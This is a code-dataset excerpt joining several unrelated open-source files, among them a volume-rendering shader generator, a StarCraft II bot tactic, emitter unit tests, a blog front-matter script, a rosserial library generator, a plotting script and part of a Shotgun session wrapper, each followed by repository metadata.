# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ===========================================================================
#
# This modified version is released under the BSD license given in the LICENSE
# file in this repository.
try:
from textwrap import indent
except ImportError: # Python < 3.5
def indent(text, prefix):
return '\n'.join(prefix + line for line in text.splitlines())
# Vertex shader
VERT_SHADER = """
attribute vec3 a_position;
uniform vec3 u_shape;
varying vec3 v_position;
varying vec4 v_nearpos;
varying vec4 v_farpos;
void main() {
v_position = a_position;
// Project local vertex coordinate to camera position. Then do a step
// backward (in cam coords) and project back. Voila, we get our ray vector.
vec4 pos_in_cam = $viewtransformf(vec4(v_position, 1));
// intersection of ray and near clipping plane (z = -1 in clip coords)
pos_in_cam.z = -pos_in_cam.w;
v_nearpos = $viewtransformi(pos_in_cam);
// intersection of ray and far clipping plane (z = +1 in clip coords)
pos_in_cam.z = pos_in_cam.w;
v_farpos = $viewtransformi(pos_in_cam);
gl_Position = $transform(vec4(v_position, 1.0));
}
"""
# Fragment shader
FRAG_SHADER = """
// uniforms
{declarations}
uniform vec3 u_shape;
uniform float u_downsample;
uniform vec4 u_bgcolor;
uniform vec3 u_clip_min;
uniform vec3 u_clip_max;
//varyings
// varying vec3 v_texcoord;
varying vec3 v_position;
varying vec4 v_nearpos;
varying vec4 v_farpos;
// uniforms for lighting. Hard coded until we figure out how to do lights
const vec4 u_ambient = vec4(0.2, 0.4, 0.2, 1.0);
const vec4 u_diffuse = vec4(0.8, 0.2, 0.2, 1.0);
const vec4 u_specular = vec4(1.0, 1.0, 1.0, 1.0);
const float u_shininess = 40.0;
//varying vec3 lightDirs[1];
// global holding view direction in local coordinates
vec3 view_ray;
// for some reason, this has to be the last function in order for the
// filters to be inserted in the correct place...
float rand(vec3 co) {{
float a = 12.9898;
float b = 78.233;
float c = 43758.5453;
float dt= dot(vec2(co.x, co.y + co.z) ,vec2(a,b));
float sn= mod(dt,3.14);
return fract(sin(sn) * c);
}}
void main() {{
vec3 farpos = v_farpos.xyz / v_farpos.w;
vec3 nearpos = v_nearpos.xyz / v_nearpos.w;
// Calculate unit vector pointing in the view direction through this
// fragment.
view_ray = normalize(farpos.xyz - nearpos.xyz);
// Compute the distance to the front surface or near clipping plane
float distance = dot(nearpos-v_position, view_ray);
distance = max(distance, min((-0.5 - v_position.x) / view_ray.x,
(u_shape.x - 0.5 - v_position.x) / view_ray.x));
distance = max(distance, min((-0.5 - v_position.y) / view_ray.y,
(u_shape.y - 0.5 - v_position.y) / view_ray.y));
distance = max(distance, min((-0.5 - v_position.z) / view_ray.z,
(u_shape.z - 0.5 - v_position.z) / view_ray.z));
// Now we have the starting position on the front surface
vec3 front = v_position + view_ray * distance;
// Decide how many steps to take
int nsteps = int(-distance / u_downsample + 0.5);
if(nsteps < 1) discard;
// Get starting location and step vector in texture coordinates
vec3 step = ((v_position - front) / u_shape) / nsteps;
vec3 start_loc = front / u_shape;
float val;
// This outer loop seems necessary on some systems for large
// datasets. Ugly, but it works ...
vec3 loc = start_loc;
int iter = 0;
{before_loop}
// We avoid putting this if statement in the loop for performance
if (u_downsample > 1.) {{
// In the case where we are downsampling we use a step size that is
// random to avoid artifacts in the output. This appears to be fast
// enough to still make the downsampling worth it.
while (iter < nsteps) {{
for (iter=iter; iter<nsteps; iter++)
{{
{in_loop}
// Advance location deeper into the volume
loc += (0.5 + rand(loc)) * step;
}}
}}
}} else {{
while (iter < nsteps) {{
for (iter=iter; iter<nsteps; iter++)
{{
{in_loop}
// Advance location deeper into the volume
loc += step;
}}
}}
}}
float count = 0;
vec4 color = vec4(0., 0., 0., 0.);
vec4 total_color = vec4(0., 0., 0., 0.);
float max_alpha = 0;
{after_loop}
if(count > 0) {{
total_color /= count;
total_color.a = max_alpha;
// Due to issues with transparency in Qt5, we need to convert the color
// to a flattened version without transparency, so we do alpha blending
// with the background and set alpha to 1:
total_color.r = total_color.r * total_color.a + u_bgcolor.r * (1 - total_color.a);
total_color.g = total_color.g * total_color.a + u_bgcolor.g * (1 - total_color.a);
total_color.b = total_color.b * total_color.a + u_bgcolor.b * (1 - total_color.a);
total_color.a = 1.;
}} else {{
// For this it seems we can get away with using transparency (which we need
// to make sure axes/ticks/labels aren't hidden)
total_color = vec4(0, 0, 0, 0);
}}
gl_FragColor = total_color;
/* Set depth value - from visvis TODO
int iter_depth = int(maxi);
// Calculate end position in world coordinates
vec4 position2 = vertexPosition;
position2.xyz += ray*shape*float(iter_depth);
// Project to device coordinates and set fragment depth
vec4 iproj = gl_ModelViewProjectionMatrix * position2;
iproj.z /= iproj.w;
gl_FragDepth = (iproj.z+1.0)/2.0;
*/
}}
"""
def get_frag_shader(volumes, clipped=False, n_volume_max=5):
"""
Get the fragment shader code - we use the shader_program object to determine
which layers are enabled and therefore what to include in the shader code.
"""
declarations = ""
before_loop = ""
in_loop = ""
after_loop = ""
for index in range(n_volume_max):
declarations += "uniform $sampler_type u_volumetex_{0:d};\n".format(index)
before_loop += "dummy = $sample(u_volumetex_{0:d}, loc).g;\n".format(index)
declarations += "uniform $sampler_type dummy1;\n"
declarations += "float dummy;\n"
for label in sorted(volumes):
index = volumes[label]['index']
# Global declarations
declarations += "uniform float u_weight_{0:d};\n".format(index)
declarations += "uniform int u_enabled_{0:d};\n".format(index)
# Declarations before the raytracing loop
before_loop += "float max_val_{0:d} = 0;\n".format(index)
# Calculation inside the main raytracing loop
in_loop += "if(u_enabled_{0:d} == 1) {{\n\n".format(index)
if clipped:
in_loop += ("if(loc.r > u_clip_min.r && loc.r < u_clip_max.r &&\n"
" loc.g > u_clip_min.g && loc.g < u_clip_max.g &&\n"
" loc.b > u_clip_min.b && loc.b < u_clip_max.b) {\n\n")
in_loop += "// Sample texture for layer {0}\n".format(label)
in_loop += "val = $sample(u_volumetex_{0:d}, loc).g;\n".format(index)
if volumes[label].get('multiply') is not None:
index_other = volumes[volumes[label]['multiply']]['index']
in_loop += ("if (val != 0) {{ val *= $sample(u_volumetex_{0:d}, loc).g; }}\n"
.format(index_other))
in_loop += "max_val_{0:d} = max(val, max_val_{0:d});\n\n".format(index)
if clipped:
in_loop += "}\n\n"
in_loop += "}\n\n"
# Calculation after the main loop
after_loop += "// Compute final color for layer {0}\n".format(label)
after_loop += ("color = $cmap{0:d}(max_val_{0:d});\n"
"color.a *= u_weight_{0:d};\n"
"total_color += color.a * color;\n"
"max_alpha = max(color.a, max_alpha);\n"
"count += color.a;\n\n").format(index)
if not clipped:
before_loop += "\nfloat val3 = u_clip_min.g + u_clip_max.g;\n\n"
# Code esthetics
before_loop = indent(before_loop, " " * 4).strip()
in_loop = indent(in_loop, " " * 16).strip()
after_loop = indent(after_loop, " " * 4).strip()
return FRAG_SHADER.format(declarations=declarations,
before_loop=before_loop,
in_loop=in_loop,
after_loop=after_loop)
def main():
volumes = {}
volumes['banana'] = {'index': 3, 'enabled': True}
volumes['apple'] = {'index': 1, 'multiply': None, 'enabled': True}
volumes['apple'] = {'index': 1, 'multiply': 'banana', 'enabled': True}
print(get_frag_shader(volumes))
if __name__ == "__main__": # pragma: nocover
main()
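# Additional illustration (not part of the original module): passing clipped=True emits
# the u_clip_min/u_clip_max bounds test around each texture sample, e.g.
#   src = get_frag_shader({'banana': {'index': 0}}, clipped=True)
# where the layer name and index are placeholders.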
| 34.702875
| 90
| 0.625575
|
0c2670963f285453784cc951da34c764a8e261e9
| 747
|
py
|
Python
|
sharpy/plans/tactics/terran/man_the_bunkers.py
|
eladyaniv01/sharpy-sc2
|
91119cc3e3fce683c2dbe9687c616c9cc0461b06
|
[
"MIT"
] | null | null | null |
sharpy/plans/tactics/terran/man_the_bunkers.py
|
eladyaniv01/sharpy-sc2
|
91119cc3e3fce683c2dbe9687c616c9cc0461b06
|
[
"MIT"
] | null | null | null |
sharpy/plans/tactics/terran/man_the_bunkers.py
|
eladyaniv01/sharpy-sc2
|
91119cc3e3fce683c2dbe9687c616c9cc0461b06
|
[
"MIT"
] | null | null | null |
from sharpy.plans.acts import ActBase
from sharpy.managers.roles import UnitTask
from sc2 import UnitTypeId, AbilityId
class ManTheBunkers(ActBase):
def __init__(self):
super().__init__()
async def execute(self) -> bool:
roles: 'UnitRoleManager' = self.knowledge.roles
bunkers = self.cache.own(UnitTypeId.BUNKER).ready
marines = self.cache.own(UnitTypeId.MARINE)
for bunker in bunkers: # type: Unit
if len(bunker.passengers) >= 4:
continue
if marines:
marine = marines.closest_to(bunker) #.prefer_idle()
self.do(marine(AbilityId.SMART, bunker))
roles.set_task(UnitTask.Reserved, marine)
return True
| 32.478261
| 67
| 0.631861
|
0f8f027f2f175380d970bea7fb1d80316440ca6d
| 1,451
|
py
|
Python
|
emitter_test.py
|
AjayMT/emitter
|
8b8c1aaab39ca858a59ad45a36f22f2737a0d46a
|
[
"MIT"
] | 1
|
2021-01-04T05:29:49.000Z
|
2021-01-04T05:29:49.000Z
|
emitter_test.py
|
AjayMT/emitter
|
8b8c1aaab39ca858a59ad45a36f22f2737a0d46a
|
[
"MIT"
] | null | null | null |
emitter_test.py
|
AjayMT/emitter
|
8b8c1aaab39ca858a59ad45a36f22f2737a0d46a
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from emitter import Emitter
class TestEmitter(TestCase):
def setUp(self):
self.emitter = Emitter()
def test_call_listeners(self):
called = [False]
def cb():
called[0] = True
self.emitter.on('hello.*', cb)
self.emitter.emit('hello.foo')
assert called[0]
self.emitter.remove('hello.*', cb)
assert self.emitter.listeners('hello') == []
def test_pass_data_to_listeners(self):
def cb(*args):
assert args == ('a', 'b')
self.emitter.on('data', cb)
self.emitter.emit('data', 'a', 'b')
def test_call_listeners_once(self):
called = [False]
def cb():
called[0] = not called[0]
self.emitter.on('once', cb, True)
self.emitter.emit('*')
self.emitter.emit('on*')
assert called[0]
def test_remove_listeners(self):
self.emitter.on('foo', lambda x: x)
self.emitter.on('bar', lambda x: x)
self.emitter.remove('bar')
self.emitter.remove('*')
assert self.emitter.listeners('foo') == []
assert self.emitter.listeners('bar') == []
def test_emit_unknown_events(self):
self.emitter.emit('quux')
self.emitter.remove('wut')
def test_provide_listeners(self):
def cb(): pass
self.emitter.on('quux', cb)
assert self.emitter.listeners('*') == [cb]
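# Illustrative usage sketch mirroring the Emitter API exercised by the tests above; the
# 'job.*' event names are placeholders.
if __name__ == '__main__':
    em = Emitter()
    def on_job(*args):
        print('job event:', args)
    em.on('job.*', on_job)        # wildcard listener, as in test_call_listeners
    em.emit('job.done', 42)       # on_job receives (42,)
    em.remove('job.*')
    assert em.listeners('job.*') == []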
| 25.017241
| 52
| 0.565817
|
2e226a6a79da98634da562ec1d907f9d750a268b
| 1,955
|
py
|
Python
|
blog_info.py
|
Admiraldesvl/blog_info
|
a9336f5cad8b095c449a72802185548ee3a4f40e
|
[
"MIT"
] | null | null | null |
blog_info.py
|
Admiraldesvl/blog_info
|
a9336f5cad8b095c449a72802185548ee3a4f40e
|
[
"MIT"
] | null | null | null |
blog_info.py
|
Admiraldesvl/blog_info
|
a9336f5cad8b095c449a72802185548ee3a4f40e
|
[
"MIT"
] | null | null | null |
from datetime import date
import json
from shutil import copy
print("请输入文件名:")
fName = input()
File = open(fName,'w')
jsonFile = open("blog_info.json","r") # 在 blog_info.json里添加默认配置
data = json.load(jsonFile)
File.write('---\n')
# Comment toggle
print("Enable comments? (Y/N)")
m=input()
if(m=="Y"):
File.write("comment: true\n")
else:
File.write("comment: false\n")
# MathJax toggle
print("Display math formulas? (Y/N)")
m=input()
if(m=="Y"):
File.write("mathjax: true\n")
else:
File.write("mathjax: false\n")
# Article title
print("Please enter the article title:")
m = input()
File.write("title: " + m + "\n")
# Article summary
print("Please enter the article summary:")
m = input()
File.write("summary: "+m+"\n")
# Date
today = date.today()
d1 = today.strftime("%y-%m-%d\n")
File.write("date: " + d1)
# Author
File.write("author: "+data['author'][0]+'\n')
# Tags
print("Enter a number to select a tag, or enter -1 to add a new tag")
size = len(data['tags'])
File.write("tags: [\n\t")
for i in range(0,size):
print(str(i)+'. '+data['tags'][i])
while (1): # TODO: find a better way to structure this loop
m=int(input())
if(m>=0 and m<size):
File.write("\""+data['tags'][m]+"\"")
if(m==-1):
print("请输入新标签的名称") # TODO: 将新标签写入文件
m = input()
File.write("\""+m+"\"")
print("是否继续输入标签?(Y/N)")
m = input()
if(m!='Y'):
break
File.write(",")
File.write("\n]\n")
# Categories
print("Enter a number to select a category, or enter -1 to add a new category")
size = len(data['categories'])
File.write("categories: [\n\t")
for i in range(0,size):
print(str(i)+'. '+data['categories'][i])
while (1):
m=int(input())
if(m>=0 and m<size):
File.write("\""+data['categories'][m]+"\"")
if(m==-1):
print("请输入新分类的名称") # TODO: 将新分类写入文件
m = input()
File.write("\""+m+"\"")
print("是否继续输入分类?(Y/N)")
m = input()
if(m!='Y'):
break
File.write(",")
File.write("\n]\n")
File.write("---\n")
# Write the post body
print("Please enter the name of the file to insert")
m = input()
mdFile = open(m,'r')
mdText = mdFile.read()
File.write(mdText)
File.close()
copy(fName,data['path'][0])
jsonFile.close()
mdFile.close()
| 21.966292
| 63
| 0.568286
|
7cb055b373325fd9191bf7a36a232c8e96f3dfc0
| 3,802
|
py
|
Python
|
rosserial/rosserial_vex_v5/src/rosserial_vex_v5/make_libraries.py
|
JVR01/3DPrinted_Robot_ArmRepo
|
0f0b5aa7ddb9279f11aba6ad7c2a38c2d8926714
|
[
"MIT"
] | 1
|
2020-11-20T03:10:18.000Z
|
2020-11-20T03:10:18.000Z
|
rosserial/rosserial_vex_v5/src/rosserial_vex_v5/make_libraries.py
|
JVR01/3DPrinted_Robot_ArmRepo
|
0f0b5aa7ddb9279f11aba6ad7c2a38c2d8926714
|
[
"MIT"
] | 30
|
2020-11-27T23:12:12.000Z
|
2021-04-25T15:37:42.000Z
|
rosserial/rosserial_vex_v5/src/rosserial_vex_v5/make_libraries.py
|
JVR01/3DPrinted_Robot_ArmRepo
|
0f0b5aa7ddb9279f11aba6ad7c2a38c2d8926714
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
#####################################################################
# Software License Agreement (BSD License)
#
# Copyright (c) 2013, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
THIS_PACKAGE = "rosserial_vex_v5"
__usage__ = """
make_libraries.py generates the VEX Robot Brain rosserial library files. It requires the location of the include directory of a PROS kernel.
rosrun rosserial_vex_v5 make_libraries.py <pros_include_dir>
"""
import rospkg
import rosserial_client
from rosserial_client.make_library import *
# for copying files
import shutil
import os.path
ROS_TO_EMBEDDED_TYPES = {
'bool' : ('bool', 1, PrimitiveDataType, []),
'byte' : ('int8_t', 1, PrimitiveDataType, []),
'int8' : ('int8_t', 1, PrimitiveDataType, []),
'char' : ('uint8_t', 1, PrimitiveDataType, []),
'uint8' : ('uint8_t', 1, PrimitiveDataType, []),
'int16' : ('int16_t', 2, PrimitiveDataType, []),
'uint16' : ('uint16_t', 2, PrimitiveDataType, []),
'int32' : ('int32_t', 4, PrimitiveDataType, []),
'uint32' : ('uint32_t', 4, PrimitiveDataType, []),
'int64' : ('int64_t', 8, PrimitiveDataType, []),
'uint64' : ('uint64_t', 8, PrimitiveDataType, []),
'float32' : ('float', 4, PrimitiveDataType, []),
'float64' : ('float', 4, AVR_Float64DataType, []),
'time' : ('ros::Time', 8, TimeDataType, ['ros/time']),
'duration': ('ros::Duration', 8, TimeDataType, ['ros/duration']),
'string' : ('char*', 0, StringDataType, []),
'Header' : ('std_msgs::Header', 0, MessageDataType, ['std_msgs/Header'])
}
# need correct inputs
if (len(sys.argv) < 2):
print(__usage__)
exit()
# get output path
output_path = os.path.join(sys.argv[1], "ros_lib")
print("\nExporting to %s" % output_path)
rospack = rospkg.RosPack()
# copy ros_lib stuff in
shutil.rmtree(output_path, ignore_errors=True)
shutil.copytree(os.path.join(rospack.get_path(THIS_PACKAGE), "src", "ros_lib"), output_path)
rosserial_client_copy_files(rospack, output_path)
# generate messages
rosserial_generate(rospack, output_path, ROS_TO_EMBEDDED_TYPES)
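# Example invocation (illustrative; the PROS include path is a placeholder):
#   rosrun rosserial_vex_v5 make_libraries.py ~/pros-project/include
# which regenerates ~/pros-project/include/ros_lib with the copied ros_lib sources and
# the generated message definitions.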
| 42.244444
| 140
| 0.665439
|
979d569a9e48138a47b57f500ad2cdee19c670fb
| 2,213
|
py
|
Python
|
open_spiel/python/optimal_stopping_tests/test_traces.py
|
jstymne/repo
|
88b2cec2509edb54e60cef2faf83a74e81cf66de
|
[
"Apache-2.0"
] | null | null | null |
open_spiel/python/optimal_stopping_tests/test_traces.py
|
jstymne/repo
|
88b2cec2509edb54e60cef2faf83a74e81cf66de
|
[
"Apache-2.0"
] | null | null | null |
open_spiel/python/optimal_stopping_tests/test_traces.py
|
jstymne/repo
|
88b2cec2509edb54e60cef2faf83a74e81cf66de
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
if __name__ == '__main__':
#with open(f'traces/O_1.npy', 'rb') as f:
# O_1 = np.load(f, allow_pickle=True)
#with open(f'traces/O_2.npy', 'rb') as f:
# O_2 = np.load(f, allow_pickle=True)
with open(f'O_3.npy', 'rb') as f:
O_3 = np.load(f, allow_pickle=True)
#with open(f'traces/Z_1.npy', 'rb') as f:
# Z_1 = np.load(f, allow_pickle=True)
#with open(f'traces/Z_2.npy', 'rb') as f:
# Z_2 = np.load(f, allow_pickle=True)
with open(f'Z_3.npy', 'rb') as f:
Z_3 = np.load(f, allow_pickle=True)
#with open(f'new_Z3.npy', 'rb') as f:
# Z_3 = np.load(f, allow_pickle=True)
#print(O_1.shape)
#print(O_2.shape)
#print(O_3.shape)
#print(Z_1.shape)
#print(Z_2.shape)
#print(Z_3.shape)
#print(Z_1[:,:,0])
#print(Z_1[0,:,:] == Z_1[1,:,:] )
plt.figure()
#print(Z_1[:,:,0])
#obs = O_1
#Z_3 = Z_3[0,0:2,:]
obs_dist = Z_3[0,:]
obs_dist_intrusion = Z_3[1,:]
print(obs_dist_intrusion)
#np.save("Z_3.npy",Z_3,allow_pickle=True)
#print("sum" + str(sum(Z_1[0,0,:])))
plt.figure()
# set width of bar
#barWidth = 0.25
fig = plt.subplots(figsize =(12, 8))
"""
# Set position of bar on X axis
br = np.arange(len(obs))
br1 = [x for x in br]
br2 = [x + barWidth for x in br]
"""
# Make the plot
#plt.bar(br1, obs_dist, width = barWidth,
# edgecolor ='grey', label = "Observation probability in state 0 = no intrusion")
#plt.bar(br2, obs_dist_intrusion, width = barWidth,
# edgecolor ='grey', label = "Observation probability in state 1 = intrusion")
#print(obs_dist[:-1])
#print(obs_dist_intrusion[:-1])
plt.plot(obs_dist[:-1], label = "Observation probability in state 0 = no intrusion")
plt.plot(obs_dist_intrusion[:-1], label = "Observation probability in state 1 = intrusion")
# Adding Xticks
plt.xlabel("# of severe IDS alters", fontweight ='bold', fontsize = 16)
plt.ylabel("Observation probability", fontweight ='bold', fontsize = 16)
#plt.xticks([r + barWidth/2 for r in range(len(obs))],
# obs)
ax = plt.gca()
plt.legend(fontsize = 16, bbox_to_anchor=(0.67, 1.15), bbox_transform=ax.transAxes)
#plt.legend()
plt.savefig('obs_dist_plot_traces')
| 29.905405
| 91
| 0.637596
|
eb00e411e90a36168c60a2f2b07c2ba28d4cdd1e
| 36,146
|
py
|
Python
|
sgsession/session.py
|
VFXetc/sgsession
|
6ae016e376fda26ac8c2fbb48d96b878bd446da2
|
[
"BSD-3-Clause"
] | 9
|
2017-04-05T12:38:53.000Z
|
2021-06-25T15:41:07.000Z
|
sgsession/session.py
|
vfxetc/sgsession
|
6ae016e376fda26ac8c2fbb48d96b878bd446da2
|
[
"BSD-3-Clause"
] | null | null | null |
sgsession/session.py
|
vfxetc/sgsession
|
6ae016e376fda26ac8c2fbb48d96b878bd446da2
|
[
"BSD-3-Clause"
] | 3
|
2017-07-04T22:59:15.000Z
|
2018-05-19T22:47:26.000Z
|
"""The Session is a wrapper around a Shotgun instance, proxying requests to
the server and applying additional logic on top of it. The Session instance is
designed to be used for a single task and then discarded, since it makes the
assumption that entity relationships do not change.
While not fully documented below, this object will proxy all attributes to the
underlying Shotgun instance, so you can treat this as you would a Shotgun
instance.
"""
from __future__ import with_statement, absolute_import
import errno
import functools
import itertools
import json
import logging
import os
import re
import threading
import urlparse
import warnings
from sgschema import Schema
from dirmap import DirMap
from .entity import Entity
from .pool import ShotgunPool
from .utils import expand_braces, parse_isotime, shotgun_api3_connect, cached_property
log = logging.getLogger(__name__)
class EntityNotFoundWarning(UserWarning):
pass
class EntityNotFoundError(ValueError):
pass
def _asyncable(func):
"""Wrap a function, so that async=True will run it in a thread."""
@functools.wraps(func)
def _wrapped(self, *args, **kwargs):
if kwargs.pop('async', False):
return self._submit_concurrent(func, self, *args, **kwargs)
else:
return func(self, *args, **kwargs)
return _wrapped
def _assert_ownership(func):
"""Wrap a function that takes a list of entities, and make sure that we own them."""
@functools.wraps(func)
def _wrapped(self, entities, *args, **kwargs):
entities = list(entities)
for e in entities:
if isinstance(e, Entity):
if e.session is not self:
raise ValueError('Entity not from this session', e, self)
else:
raise TypeError('Non-Entity passed as entity', e)
return func(self, entities, *args, **kwargs)
return _wrapped
_recursion_sentinel = object()
class Session(object):
"""Shotgun wrapper.
:param shotgun: A Shotgun instance to wrap, or the name to be passed to
``shotgun_api3_registry.connect()`` in order to construct one.
If passed a name, the remaining args and kwargs will also be passed to the
api registry connector.
If passed a descendant of ``shotgun_api3.Shotgun`` (or one is constructed
via the registry), it will be wrapped in a :class:`~sgsession.pool.ShotgunPool` so that
it becomes thread-safe. Any other objects (e.g. mock servers) are used
unmodified.
If passed nothing, ``shotgun_api3_registry.connect`` will be called
the first time :attr:`shotgun` is accessed (which will happen on many
operations). To stop this behaviour, pass ``False``.
"""
#: Mapping of entity types to the field where their "parent" lives.
parent_fields = {
'Asset': 'project',
'Project': None,
'Sequence': 'project',
'Shot': 'sg_sequence',
'Task': 'entity',
'PublishEvent': 'sg_link',
'Version': 'entity',
# Lofty Sky custom entities.
        # Please complain loudly if they affect your studio, because I have
# a plan to do this better.
'CustomEntity06': 'project', # $Book
'CustomEntity04': 'sg_book', # $BookIssue
'CustomEntity21': 'sg_issue', # $BookPage
}
#: Fields to always fetch for every entity.
important_fields_for_all = ['updated_at']
#: Fields to always fetch: maps entity type to a list of fields.
important_fields = {
'Asset': ['code', 'sg_asset_type'],
'HumanUser': ['firstname', 'lastname', 'email', 'login'],
'Project': ['name'],
'PublishEvent': ['code', 'sg_type', 'sg_version'],
'Sequence': ['code'],
'Shot': ['code'],
'Step': ['code', 'short_name', 'entity_type'],
'Task': ['step', 'content'],
'Version': ['code', 'sg_task'],
# Lofty Sky custom entities.
'CustomEntity06': ['code'], # $Book
'CustomEntity04': ['code'], # $BookIssue
'CustomEntity21': ['code'], # $BookPage
}
#: Links to always fetch: maps entity type to a mapping of field names to
#: a list of their potential entity types.
important_links = {
'Asset': {
'project': ['Project'],
},
'Sequence': {
'project': ['Project'],
},
'Shot': {
'project': ['Project'],
'sg_sequence': ['Sequence'],
},
'Task': {
'project': ['Project'],
'entity': ['Asset', 'Shot'],
'step': ['Step'],
},
'PublishEvent': {
'project': ['Project'],
'sg_link': ['Task'],
},
}
def __init__(self, shotgun=None, schema=None, dir_map=None, **kwargs):
# Lookup strings in the script registry.
if isinstance(shotgun, basestring):
shotgun = shotgun_api3_connect(shotgun, **kwargs)
# Wrap basic shotgun instances in our threader.
self._shotgun = ShotgunPool.wrap(shotgun)
self._shotgun_kwargs = None if shotgun else kwargs
self._schema = schema
self._dir_map = dir_map
self._cache = {}
self._thread_pool = None
@classmethod
def from_entity(cls, entity, *args, **kwargs):
if isinstance(entity, Entity) and entity.session:
return entity.session
else:
return cls(*args, **kwargs)
@property
def shotgun(self):
# Automatically generate Shotgun when we need one.
# We use False to track that there should be nothing set here.
if self._shotgun is None:
self._shotgun = ShotgunPool.wrap(shotgun_api3_connect(
**self._shotgun_kwargs
)) or False
return self._shotgun
@property
def schema(self):
        # Automatically load schema when we need one.
# We use False to track that there should be nothing set here.
if self._schema is None:
# Wait on caching a schema here until there is a Shotgun.
shotgun = self.shotgun
if not shotgun:
return
try:
self._schema = Schema.from_cache(shotgun)
except ValueError:
self._schema = False
return self._schema or None
@cached_property
def dir_map(self):
return DirMap(self._dir_map or os.environ.get('SGSESSION_DIR_MAP'))
def __getattr__(self, name):
return getattr(self.shotgun, name)
def __reduce__(self):
# We assume that the shotgun and sgcache will automatically regenerate.
# Generally, the user should be very careful when pickling sessions.
shotgun = False if self._shotgun is False else None
schema = False if self._schema is False else None
return self.__class__, (shotgun, schema)
def merge(self, data, over=None, created_at=None, _depth=0, _memo=None):
"""Import data containing raw entities into the session.
This will effectively return a copy of any nested structure of lists,
tuples, and dicts, while converting any dicts which look like entities
into an :class:`.Entity`. The returned structure is a copy of the
original.
:param dict data: The raw fields to convert into an :class:`~sgsession.entity.Entity`.
:param bool over: Control for merge behaviour with existing data.
``True`` results in the new data taking precedence, and ``False``
the old data. The default of ``None`` will automatically decide
based on the ``updated_at`` field.
:return: The :class:`~sgsession.entity.Entity`. This will not be a new instance if the
entity was already in the session, but it will have all the newly
merged data in it.
"""
# Track down where we are getting string created_at from.
if created_at and isinstance(created_at, basestring):
# This can be a huge message...
log.error('string created_at (%r) given to Session.merge at depth %d; data to merge: %r' % (
created_at, _depth, data,
))
created_at = parse_isotime(created_at)
# Since we are dealing with recursive structures, we need to memoize
# the outputs by all of the inputs as we create them.
if _memo is None:
_memo = {}
id_ = id(data)
if id_ in _memo:
return _memo[id_]
_memo[id_] = _recursion_sentinel
obj = self._merge(data, over, created_at, _depth, _memo)
# If something fails at setting up a recursive object before returning,
# then we want to fail very hard.
if obj is _recursion_sentinel:
raise RuntimeError('un-memoized recursion')
_memo[id_] = obj
return obj
def _merge(self, data, over, created_at, depth, memo):
# No need to worry about resolving schema here, since Entity.__setitem__
# will ultimately do it.
# Pass through entities if they are owned by us.
if isinstance(data, Entity) and data.session is self:
return data
# Contents of lists and tuples should get merged.
if isinstance(data, list):
# Lists can be cyclic; memoize them.
memo[id(data)] = new = type(data)()
new.extend(self.merge(x, over, created_at, depth + 1, memo) for x in data)
return new
if isinstance(data, tuple):
return type(data)(self.merge(x, over, created_at, depth + 1, memo) for x in data)
if isinstance(data, basestring):
return self.dir_map(data)
if not isinstance(data, dict):
return data
# Non-entity dicts have all their values merged.
if not ('type' in data and 'id' in data):
memo[id(data)] = new = type(data)() # Setup recursion block.
new.update((k, self.merge(v, over, created_at)) for k, v in data.iteritems())
return new
# If it already exists, then merge this into the old one.
new = Entity(data['type'], data['id'], self)
key = new.cache_key
entity = self._cache.setdefault(new.cache_key, new)
memo[id(data)] = entity # Setup recursion block.
entity._update(data, over, created_at, depth + 1, memo)
return entity
def parse_user_input(self, spec, entity_types=None, fetch_project_from_page=False):
"""Parse user input into an entity.
:param str spec: The string of input from the user.
:param tuple entity_types: Acceptable entity types. Effective against
paths.
:param bool fetch_project_from_page: Allow pulling projects from the
more abstract pages.
:return: :class:`.Entity` or ``None``.
Acceptable forms of input are:
- Type-ID tuples, e.g. ``Task:123``, or ``Task_123``; accepts arbitrary
URL-like fields, e.g. ``Task:123?code=Example``.
- JSON, e.g. ``{"type": "Task", "id", 123}``
- Bare IDs, e.g. ``123``; only if ``entity_types`` is provided.
- Shotgun URLs including the entity, e.g. ``https://example.shotgunstudio.com/detail/Task/123`` or
``https://example.shotgunstudio.com/page/999#Task_123_Example``
- Shotgun pages without an entity, e.g. ``https://example.shotgunstudio.com/page/999``,
which describes ``Task 123``; only when ``fetch_project_from_page``.
Example::
>>> sg.parse_user_input('Task:123')
<Entity Task:123 at 0x110863618>
"""
spec = spec.strip()
# JSON.
if spec.startswith('{') and spec.endswith('}'):
raw = json.loads(spec)
if 'type' not in raw or 'id' not in raw:
raise ValueError('incomplete JSON entity', spec)
